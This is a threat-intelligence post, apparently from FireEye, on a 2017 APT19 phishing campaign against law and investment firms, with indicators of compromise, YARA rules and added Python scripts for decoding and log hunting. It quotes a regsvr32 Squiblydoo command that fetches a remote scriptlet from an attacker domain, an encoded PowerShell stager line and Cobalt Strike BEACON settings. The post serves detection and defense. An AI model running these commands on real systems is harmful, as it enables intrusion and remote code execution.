Privileges and Credentials: Phished at the Request of Counsel

Summary

In May and June 2017, FireEye observed a phishing campaign targeting
at least seven global law and investment firms. We have associated
this campaign with APT19, a group that we assess is composed of
freelancers, with some degree of sponsorship by the Chinese government.

APT19 used three different techniques to attempt to compromise
targets. In early May, the phishing lures leveraged RTF attachments
that exploited the Microsoft Windows vulnerability described in
CVE-2017-0199. Toward the end of May, APT19 switched to using
macro-enabled Microsoft Excel (XLSM) documents. In the most recent
versions, APT19 added an application whitelisting bypass to the XLSM
documents. At least one observed phishing lure delivered a Cobalt
Strike payload.

As of the writing of this blog post, FireEye had not observed
post-exploitation activity by the threat actors, so we cannot assess
the goal of the campaign. We have previously observed APT19 steal data
from law and investment firms for competitive economic purposes.

The purpose of this blog post is to inform law firms and investment
firms of this phishing campaign and provide technical indicators that
their IT personnel can use for proactive hunting and detection.

The Emails

APT19 phishing emails from this campaign originated from sender
email accounts from the “@cloudsend[.]net” domain and used a
variety of subjects and attachment names. Refer to the Indicators of
Compromise section for more details.

The Attachments

APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft
Excel (XLSM) files to deliver their initial exploits. The following
sections describe the two methods in further detail.

RTF Attachments

Through the exploitation of the HTA handler vulnerability described
in CVE-2017-0199, the observed RTF attachments download
hxxp://tk-in-f156.2bunny[.]com/Agreement.doc. Unfortunately, this file
was no longer hosted at tk-in-f156.2bunny[.]com for further analysis.
Figure 1 is a screenshot of a packet capture showing one of the RTF
files reaching out to hxxp://tk-in-f156.2bunny[.]com/Agreement.doc.

Figure 1: RTF PCAP

XLSM Attachments

The XLSM attachments contained multiple worksheets with content that
reflected the attachment name. The attachments also contained an image
that requested the user to “Enable Content”, which would enable macro
support if it was disabled. Figure 2 provides a screenshot of one of
the XLSM files (MD5:30f149479c02b741e897cdb9ecd22da7).

Figure 2: Enable macros

One of the malicious XLSM attachments that we observed contained a
macro that:

  1. Determined the system architecture to select the correct path
    for PowerShell
  2. Launched a ZLIB compressed and Base64
    encoded command with PowerShell. This is a typical technique used by
    Meterpreter stagers.

Figure 3 depicts the macro embedded within the XLSM file (MD5: 38125a991efc6ab02f7134db0ebe21b6).

Figure 3: XLSX Macro

Figure 4 contains the decoded output of the encoded text.

Figure 4: Decoded ZLIB + Base64 payload

The shellcode invokes PowerShell to issue an HTTP GET request for a
random four-character URI on the root of
autodiscovery[.]2bunny[.]com. The requests contain minimal HTTP
headers since the PowerShell command is executed with mostly default
parameters. Figure 5 depicts an HTTP GET request generated by the
payload, with minimal HTTP headers.

Figure 5: GET Request with minimal HTTP headers

Converting the shellcode to ASCII and removing the non-printable
characters provides a quick way to pull out network-based indicators
(NBI) from the shellcode. Figure 6 shows the extracted NBIs.

Figure 6: Decoded shellcode
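The decoding path used for Figures 4 and 6, written out as an added example that is not part of the original post: it pulls the Base64 blob out of a command line in the shape shown above, inflates it as raw DEFLATE (which is what .NET's IO.Compression.DeflateStream produces, hence the negative zlib window size) and then extracts the printable runs that carry the network-based indicators. The payload bytes, the CompressionMode and Text.Encoding arguments in the constructed command line, and the helper names are made up for this example; the real shellcode is not reproduced.

```python
"""Decode a ZLIB/Base64 PowerShell stager command line and pull printable
network indicators out of the inflated payload (added example)."""
import base64
import re
import zlib

# .NET's IO.Compression.DeflateStream is raw DEFLATE with no zlib header,
# which zlib exposes through a negative window size.
RAW_DEFLATE = -15

# Constructed stand-in for the inflated payload: a few non-printable bytes
# wrapped around the indicators the post lists. It is not the real shellcode.
SAMPLE_PAYLOAD = (
    b"\xfc\xe8\x89\x00\x00\x00"
    + b"autodiscover.2bunny.com" + b"\x00\x00"
    + b"/K5om" + b"\x00"
    + b"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; "
      b"FunWebProducts; IE0006_ver1;EN_GB)"
    + b"\x00\xff\xd5"
)


def build_sample_cmdline(payload: bytes) -> str:
    """Wrap a payload in the command-line shape seen in the macro (constructed;
    the Decompress/ASCII arguments are assumed, the post truncates them)."""
    comp = zlib.compressobj(9, zlib.DEFLATED, RAW_DEFLATE)
    blob = base64.b64encode(comp.compress(payload) + comp.flush()).decode()
    return (
        'powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression '
        "$(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream "
        "($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('"
        + blob + "')))), [IO.Compression.CompressionMode]::Decompress)), "
        '[Text.Encoding]::ASCII)).ReadToEnd();"'
    )


# Accepts straight quotes or the curly quotes a blog copy/paste leaves behind.
BLOB_RE = re.compile(
    r"FromBase64String\(\s*[\"'\u201c\u201d]([A-Za-z0-9+/=]+)[\"'\u201c\u201d]")


def decode_stager(cmdline: str) -> bytes:
    """Extract the Base64 blob from the command line, decode and inflate it."""
    m = BLOB_RE.search(cmdline)
    if m is None:
        raise ValueError("no FromBase64String(...) blob in command line")
    return zlib.decompress(base64.b64decode(m.group(1)), RAW_DEFLATE)


PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")
HOST_RE = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)+$", re.I)


def extract_printable(data: bytes) -> list:
    """The 'strings' view of the payload: runs of 4+ printable ASCII bytes."""
    return [s.decode("ascii") for s in PRINTABLE_RUN.findall(data)]


def extract_nbis(data: bytes) -> list:
    """Keep the printable runs that look like hosts, URI paths or User-Agents."""
    return [s for s in extract_printable(data)
            if HOST_RE.match(s) or s.startswith("/") or s.startswith("Mozilla/")]


if __name__ == "__main__":
    cmd = build_sample_cmdline(SAMPLE_PAYLOAD)
    for nbi in extract_nbis(decode_stager(cmd)):
        print(nbi)
```

On a real sample, feed `decode_stager` the command line recovered from the macro (or from a process-creation event) and run `extract_printable` over the result; the host, URI and User-Agent strings surface the same way they do in Figure 6, and the architecture check in the macro does not change any of this because the PowerShell command is identical for both paths.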

FireEye also identified an alternate macro in some of the XLSM
documents, displayed in Figure 7.

Figure 7: Alternate macro

This macro uses Casey Smith's "Squiblydoo" Application Whitelisting
bypass technique to run the command in Figure 8.

Figure 8: Application Whitelisting Bypass

The command in Figure 8 downloads and launches code within an SCT
file. The SCT file in the payload (MD5:
1554d6fe12830ae57284b389a1132d65) contained the code shown in Figure 9.

Figure 9: SCT contents

Figure 10 provides the decoded script. Notice the “$DoIt” string,
which is usually indicative of a Cobalt Strike payload.

Figure 10: Decoded SCT contents

A quick conversion of the contents of the variable “$var_code” from
Base64 to ASCII shows some familiar network indicators, shown in
Figure 11.

Figure 11: $var_code to ASCII

Second Stage Payload

Once the XLSM launches its PowerShell command, it downloads a
typical Cobalt Strike BEACON payload, configured with the following parameters:

  • Process Inject Targets:
    • %windir%\syswow64\rundll32.exe
    • %windir%\sysnative\rundll32.exe
  • c2_user_agents
    • Mozilla/5.0 (compatible; MSIE 9.0;
      Windows NT 6.1; Trident/5.0; FunWebProducts;
      IE0006_ver1;EN_GB)
  • Named Pipes
    • \\%s\pipe\msagent_%x
  • beacon_interval
    • 60
  • C2
    • autodiscover.2bunny[.]com/submit.php
    • autodiscover.2bunny[.]com/IE9CompatViewList.xml
    • sfo02s01-in-f2.cloudsend[.]net/submit.php
    • sfo02s01-in-f2.cloudsend[.]net/IE9CompatViewList.xml
  • C2 Port
    • TCP/80

Figure 12 depicts an example of a BEACON C2 attempt from this payload.

Figure 12: Cobalt Strike BEACON C2

FireEye Product Detections

The following FireEye products currently detect and block the
methods described above. Table 1 lists the current detection and
blocking capabilities by product.

Detection Name                                    Product     Action   Notes
SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)         HX          Detect   XLSM Macro launch
Gen:Variant.Application.HackTool.CobaltStrike.1   HX          Detect   XLSM Macro launch
Malware Object                                    HX          Detect   BEACON written to disk
Backdoor.BEACON                                   NX          Block*   BEACON Callback
FE_Malformed_RTF                                  EX/ETP/NX   Block*   RTF
Malware.Binary.rtf                                EX/ETP/NX   Block*   RTF
Malware.Binary                                    EX/ETP/NX   Block*   RTF
Malware.Binary.xlsx                               EX/ETP/NX   Block*   XLSM

Table 1: Detection review

*Appliances must be configured for block mode.

Recommendations

FireEye recommends organizations perform the following steps to
mitigate the risk of this campaign:

  1. Microsoft Office users should apply the patch
    from Microsoft
    as soon as possible, if they have not already
    installed it.
  2. Search historic and future emails that match
    the included indicators of compromise.
  3. Review web proxy
    logs for connections to the included network based indicators of
    compromise.
  4. Block connections to the included fully qualified
    domain names.
  5. Review endpoints for the included host based
    indicators of compromise.
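Recommendations 3 and 5 (proxy log review and endpoint review) put into code, as an added example that is not FireEye's code or product logic: the network indicators and the Cobalt Strike BEACON User-Agent come from the IOC section, the Squiblydoo command line from Figure 8, the PowerShell fragments from the process-argument list, and the `msagent_%x` pipe from the BEACON configuration. The proxy log layout, the process events and the function names are constructed for the example.

```python
"""Hunt proxy logs and process events for this campaign's indicators
(added example; indicator values come from the post, sample data is constructed)."""
import re
from urllib.parse import urlparse

# Network indicators from the IOC section, defanging brackets removed.
NBI_HOSTS = {
    "lyncdiscover.2bunny.com", "autodiscover.2bunny.com", "tk-in-f156.2bunny.com",
    "tf-in-f167.2bunny.com", "sfo02s01-in-f2.cloudsend.net",
}
NBI_IPS = {"104.236.77.169", "138.68.45.9", "162.243.143.145"}
BEACON_UA = ("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; "
             "FunWebProducts; IE0006_ver1;EN_GB)")

# Constructed proxy log lines in a made-up layout:
#   <timestamp> <client-ip> <method> <url> "<user-agent>"
PROXY_LOG = [
    f'2017-06-01T10:00:01Z 10.1.1.5 GET http://autodiscover.2bunny.com/K5om "{BEACON_UA}"',
    '2017-06-01T10:00:02Z 10.1.1.5 GET http://intranet.example/news.html "Mozilla/5.0 (Windows NT 10.0) Chrome/58"',
    '2017-06-01T10:00:09Z 10.1.1.9 POST http://sfo02s01-in-f2.cloudsend.net/submit.php "Mozilla/4.0"',
    '2017-06-01T10:01:00Z 10.1.1.7 GET http://138.68.45.9/ "curl/7.0"',
]
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "(.*)"$')


def hunt_proxy_log(lines):
    """Return (client, host, reasons) for lines that hit a C2 host/IP or the BEACON User-Agent."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        _ts, client, _method, url, ua = m.groups()
        host = urlparse(url).hostname or ""
        reasons = []
        if host in NBI_HOSTS or host in NBI_IPS:
            reasons.append("c2_host")
        if ua == BEACON_UA:
            reasons.append("beacon_user_agent")
        if reasons:
            hits.append((client, host, reasons))
    return hits


# Constructed process-creation command lines (Sysmon/EDR style events).
PROCESS_EVENTS = [
    "regsvr32.exe /s /n /u /i:https://lyncdiscover.2bunny.com/Autodiscover scrobj.dll",
    r"regsvr32.exe /s C:\Windows\System32\example.dll",
    'powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object '
    "IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object "
    "IO.MemoryStream (,$([Convert]::FromBase64String('QUJD')))))).ReadToEnd();\"",
    "powershell.exe -Command Get-Date",
]

# Squiblydoo: regsvr32 told to fetch a remote scriptlet via /i: and load scrobj.dll.
SQUIBLYDOO_RE = re.compile(
    r"\bregsvr32(\.exe)?\b.*\s/i:\s*https?://\S+.*\bscrobj\.dll\b", re.I)
# Fragments of the ZLIB/Base64 stager command line listed in the HBI section.
STAGER_FRAGMENTS = ("-nop", "-noni", "-w hidden", "io.compression.deflatestream",
                    "io.memorystream", "frombase64string", "readtoend")
# BEACON named pipe \\<host>\pipe\msagent_%x (the %x suffix is hex).
MSAGENT_PIPE_RE = re.compile(r"^\\\\[^\\]+\\pipe\\msagent_[0-9a-f]+$", re.I)


def classify_cmdline(cmdline):
    """Tag a process command line with the campaign techniques it matches."""
    tags = []
    low = cmdline.lower()
    if SQUIBLYDOO_RE.search(cmdline):
        tags.append("squiblydoo_regsvr32")
    if "powershell" in low and sum(f in low for f in STAGER_FRAGMENTS) >= 4:
        tags.append("encoded_powershell_stager")
    return tags


def is_beacon_pipe(pipe_name):
    """True for pipe names shaped like BEACON's default msagent_<hex> pipe."""
    return MSAGENT_PIPE_RE.match(pipe_name) is not None


if __name__ == "__main__":
    for hit in hunt_proxy_log(PROXY_LOG):
        print("proxy:", hit)
    for ev in PROCESS_EVENTS:
        print("process:", classify_cmdline(ev), ev[:60])
```

The stager check deliberately counts fragments instead of matching the whole command line, mirroring the "4 of ($ps*)" / "6 of ($ps*)" logic of the FE_LEGALSTRIKE_MACRO_2 rule further down, so minor re-spacing of the command does not defeat it; the `msagent_` pipe check is worth running over pipe-creation telemetry as well as over command lines.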

Indicators of Compromise

The following section provides the IOCs for the variants of the
phishing emails and malicious payloads that FireEye has observed
during this campaign.

Email Senders

  • PressReader <infodept@cloudsend[.]net>
  • Angela Suh <angela.suh@cloudsend[.]net>
  • Ashley Safronoff <ashley.safronoff@cloudsend[.]net>
  • Lindsey Hersh <lindsey.hersh@cloudsend[.]net>
  • Sarah Roberto sarah.roberto@cloudsend[.]net
  • noreply@cloudsend[.]net

Email Subject Lines

  • Macron Denies Authenticity Of Leak, French Prosecutors Open Probe
  • Macron Document Leaker Releases New Images, Promises More Information
  • Are Emmanuel Macron’s Tax Evasion Documents Real?
  • Time Allocation
  • Vacancy Report
  • china paper table and graph
  • results with zeros – some ready not all finished
  • Macron Leaks contain secret plans for the islamisation of France and Europe

Attachment Names

  • Macron_Authenticity.doc.rtf
  • Macron_Information.doc.rtf
  • US and EU Trade with China and China CA.xlsm
  • Tables 4 5 7 Appendix with zeros.xlsm
  • Project Codes – 05.30.17.xlsm
  • Weekly Vacancy Status Report 5-30-15.xlsm
  • Macron_Tax_Evasion.doc.rtf
  • Macron_secret_plans.doc.rtf

Network Based Indicators (NBI)

  • lyncdiscover.2bunny[.]com
  • autodiscover.2bunny[.]com
  • lyncdiscover.2bunny[.]com:443/Autodiscover/AutodiscoverService/
  • lyncdiscover.2bunny[.]com/Autodiscover
  • autodiscover.2bunny[.]com/K5om
  • sfo02s01-in-f2.cloudsend[.]net/submit.php
  • sfo02s01-in-f2.cloudsend[.]net/IE9CompatViewList.xml
  • tk-in-f156.2bunny[.]com
  • tk-in-f156.2bunny[.]com/Agreement.doc
  • 104.236.77[.]169
  • 138.68.45[.]9
  • 162.243.143[.]145
  • Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts; IE0006_ver1;EN_GB)
  • tf-in-f167.2bunny[.]com:443 (*Only seen in VT not ITW)

Host Based Indicators (HBI)

RTF MD5 hash values

  • 0bef39d0e10b1edfe77617f494d733a8
  • 0e6da59f10e1c4685bb5b35a30fc8fb6
  • cebd0e9e05749665d893e78c452607e2

XLSX MD5 hash values

  • 38125a991efc6ab02f7134db0ebe21b6
  • 3a1dca21bfe72368f2dd46eb4d9b48c4
  • 30f149479c02b741e897cdb9ecd22da7

BEACON and Meterpreter payload MD5 hash values

  • bae0b39197a1ac9e24bdf9a9483b18ea
  • 1151619d06a461456b310096db6bc548

Process arguments, named pipes, and file paths

  • powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("<base64 blob>")
  • regsvr32.exe /s /n /u /i:hxxps://lyncdiscover.2bunny.com/Autodiscover scrobj.dll
  • \\<ip>\pipe\msagent_<4 digits>
  • C:\Documents and Settings\<user>\Local Settings\Temp\K5om.dll (4 character DLL based on URI of original GET request)

Yara Rules

rule FE_LEGALSTRIKE_MACRO {
    meta:
        version = ".1"
        filetype = "MACRO"
        author = "Ian.Ahl@fireeye.com @TekDefense"
        date = "2017-06-02"
        description = "This rule is designed to identify macros with the specific encoding used in the sample 30f149479c02b741e897cdb9ecd22da7."
    strings:
        // OBFUSCATION: ChrW()-encoded fragments of the regsvr32 Squiblydoo command line
        $ob1 = "ChrW(114) & ChrW(101) & ChrW(103) & ChrW(115) & ChrW(118) & ChrW(114) & ChrW(51) & ChrW(50) & ChrW(46) & ChrW(101)" ascii wide
        $ob2 = "ChrW(120) & ChrW(101) & ChrW(32) & ChrW(47) & ChrW(115) & ChrW(32) & ChrW(47) & ChrW(110) & ChrW(32) & ChrW(47)" ascii wide
        $ob3 = "ChrW(117) & ChrW(32) & ChrW(47) & ChrW(105) & ChrW(58) & ChrW(104) & ChrW(116) & ChrW(116) & ChrW(112) & ChrW(115)" ascii wide
        $ob4 = "ChrW(58) & ChrW(47) & ChrW(47) & ChrW(108) & ChrW(121) & ChrW(110) & ChrW(99) & ChrW(100) & ChrW(105) & ChrW(115)" ascii wide
        $ob5 = "ChrW(99) & ChrW(111) & ChrW(118) & ChrW(101) & ChrW(114) & ChrW(46) & ChrW(50) & ChrW(98) & ChrW(117) & ChrW(110)" ascii wide
        $ob6 = "ChrW(110) & ChrW(121) & ChrW(46) & ChrW(99) & ChrW(111) & ChrW(109) & ChrW(47) & ChrW(65) & ChrW(117) & ChrW(116)" ascii wide
        $ob7 = "ChrW(111) & ChrW(100) & ChrW(105) & ChrW(115) & ChrW(99) & ChrW(111) & ChrW(118) & ChrW(101) & ChrW(114) & ChrW(32)" ascii wide
        $ob8 = "ChrW(115) & ChrW(99) & ChrW(114) & ChrW(111) & ChrW(98) & ChrW(106) & ChrW(46) & ChrW(100) & ChrW(108) & ChrW(108)" ascii wide
        $obreg1 = /(\w{5}\s&\s){7}\w{5}/
        // YARA regexes are case-sensitive: the function name must be spelled ChrW as in the macro
        $obreg2 = /(ChrW\(\d{1,3}\)\s&\s){7}/
        // wscript
        $wsobj1 = "Set Obj = CreateObject(\"WScript.Shell\")" ascii wide
        $wsobj2 = "Obj.Run " ascii wide
    condition:
        (uint16(0) != 0x5A4D)
        and
        (
            (all of ($wsobj*) and 3 of ($ob*))
            or
            (all of ($wsobj*) and all of ($obreg*))
        )
}

rule FE_LEGALSTRIKE_MACRO_2 {
    meta:
        version = ".1"
        filetype = "MACRO"
        author = "Ian.Ahl@fireeye.com @TekDefense"
        date = "2017-06-02"
        description = "This rule was written to hit on specific variables and powershell command fragments as seen in the macro found in the XLSX file 3a1dca21bfe72368f2dd46eb4d9b48c4."
    strings:
        // Setting the environment
        $env1 = "Arch = Environ(\"PROCESSOR_ARCHITECTURE\")" ascii wide
        $env2 = "windir = Environ(\"windir\")" ascii wide
        $env3 = "windir + \"\\syswow64\\windowspowershell\\v1.0\\powershell.exe\"" ascii wide
        // powershell command fragments
        $ps1 = "-NoP" ascii wide
        $ps2 = "-NonI" ascii wide
        $ps3 = "-W Hidden" ascii wide
        $ps4 = "-Command" ascii wide
        $ps5 = "New-Object IO.StreamReader" ascii wide
        $ps6 = "IO.Compression.DeflateStream" ascii wide
        $ps7 = "IO.MemoryStream" ascii wide
        $ps8 = ",$([Convert]::FromBase64String" ascii wide
        $ps9 = "ReadToEnd();" ascii wide
        $psregex1 = /\W\w+\s+\s\".+\"/
    condition:
        (uint16(0) != 0x5A4D)
        and
        (
            (all of ($env*) and 6 of ($ps*))
            or
            (all of ($env*) and 4 of ($ps*) and all of ($psregex*))
        )
}

rule FE_LEGALSTRIKE_RTF {
    meta:
        version = ".1"
        filetype = "MACRO"
        author = "joshua.kim@FireEye.com"
        date = "2017-06-02"
        description = "Rtf Phishing Campaign leveraging the CVE 2017-0199 exploit, to point to the domain 2bunnyDOTcom"
    strings:
        $header = "{\\rt"

        $lnkinfo = "4c0069006e006b0049006e0066006f"

        $encoded1 = "4f4c45324c696e6b"
        $encoded2 = "52006f006f007400200045006e007400720079"
        $encoded3 = "4f0062006a0049006e0066006f"
        $encoded4 = "4f006c0065"

        $http1 = "68{"
        $http2 = "74{"
        $http3 = "07{"

        // 2bunny.com, one hex-encoded character per RTF control group
        $domain1 = "32{\\"
        $domain2 = "62{\\"
        $domain3 = "75{\\"
        $domain4 = "6e{\\"
        $domain5 = "79{\\"
        $domain6 = "2e{\\"
        $domain7 = "63{\\"
        $domain8 = "6f{\\"
        $domain9 = "6d{\\"

        $datastore = "\\*\\datastore"
    condition:
        $header at 0 and all of them
}

Acknowledgements

Joshua Kim, Nick Carr, Gerry Stellatos, Charles Carmakal, TJ Dahms,
Nick Richard, Barry Vengerik, Justin Prosco, Christopher Glyer

from Privileges and Credentials: Phished at the Request of Counsel
